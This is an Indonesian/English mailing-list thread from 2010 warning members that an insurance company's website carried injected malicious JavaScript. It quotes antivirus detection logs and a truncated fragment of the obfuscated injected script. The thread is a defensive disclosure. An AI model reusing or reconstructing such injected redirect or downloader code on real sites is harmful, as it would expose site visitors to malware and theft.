bagaimana dengan antivirus lain nya: kaspersky, mcafee, symantec, avg, dll apakah bisa mengdetect trojan ini?
salam, Johan http://blog.aerje.com/ ----- Original Message ----- From: "ShOw iP" <[email protected]> To: <[email protected]> Sent: Tuesday, June 08, 2010 4:07 PM Subject: Re: [BinusNet] AXA Financial Website was injected with JS:Illredir-CB [Trj] > Wah ternyata sampai sekarang masih belum diperbaiki ya? di NOD terdeteksi > sebagai JS/TrojanDownloader.Pegel.BP - trojan > > > > > ________________________________ > From: yanto chiang <[email protected]> > To: [email protected]; [email protected]; > [email protected]; [email protected] > Sent: Tue, June 8, 2010 11:29:00 AM > Subject: [BinusNet] AXA Financial Website was injected with > JS:Illredir-CB [Trj] > > > Dear All Member, > > This morning i got information from my friend that xxx.axa.co.id was > injected with JS:Illredir-CB [Trj]. > > From avast! antivirus found : > > avast! [YANTOCHIANG-PC]: File "http://www.axa.co.id/DropDownMenuX.js"; is > infected by "JS:Illredir-CB [Trj]" virus. > "%3" task used > Version of current VPS file is 100607-2, 06/08/2010 > > avast! [YANTOCHIANG-PC]: File "http://www.axa.co.id/ie5.js"; is infected by > "JS:Illredir-CB [Trj]" virus. > "%3" task used > Version of current VPS file is 100607-2, 06/08/2010 > > avast! [YANTOCHIANG-PC]: File "http://www.axa.co.id/"; is infected by > "JS:Illredir-CB [Trj]" virus. > "%3" task used > Version of current VPS file is 100607-2, 06/08/2010 > > And from Unmask Website Tool for analysis we found that there is a script > injected at this website : > > try {var q='cV'} catch(q){};y=["Oc","RI","S"];K=11139;K-=208;var > I;o=function(){VD=[];n=31057;n-=35... > > Summary report : > http://www.unmaskparasites.com/security-report/ > > Please protect yourselves with strongest AV client, and avoid to access > your private financial services at unknown machines which is can harmful > to yourself. > > Dear Member, > > Pagi ini saya mendapatkan informasi dari rekan saya bahwa untuk website > xxx.axa.co.id telah di injeksi oleh sejenis trojan bernama JS:Illredir-CB > [Trj. > > Dari hasil deteksi avast! antivirus ditemukan: > avast! [YANTOCHIANG-PC]: File "http://www.axa.co.id/DropDownMenuX.js"; is > infected by "JS:Illredir-CB [Trj]" virus. > "%3" task used > Version of current VPS file is 100607-2, 06/08/2010 > > avast! [YANTOCHIANG-PC]: File "http://www.axa.co.id/ie5.js"; is infected by > "JS:Illredir-CB [Trj]" virus. > "%3" task used > Version of current VPS file is 100607-2, 06/08/2010 > > avast! [YANTOCHIANG-PC]: File "http://www.axa.co.id/"; is infected by > "JS:Illredir-CB [Trj]" virus. > "%3" task used > Version of current VPS file is 100607-2, 06/08/2010 > > Sedangkan dari salah satu hasil analisa website ditemukan adanya script > yang diinjeksi pada website ini : > > try {var q='cV'} catch(q){};y=["Oc","RI","S"];K=11139;K-=208;var > I;o=function(){VD=[];n=31057;n-=35... > > Ringkasan laporan : > http://www.unmaskparasites.com/security-report/ > > Mohon untuk proteksi diri Anda dengan klien AV yang cukup handal, dan > hindari untuk melakukan akses yang berhubungan dengan keuangan pada mesin > yang tidak Anda kenal karena dapat membahayakan diri Anda sendiri. > > Thanks and Regards, > > Yanto Chiang
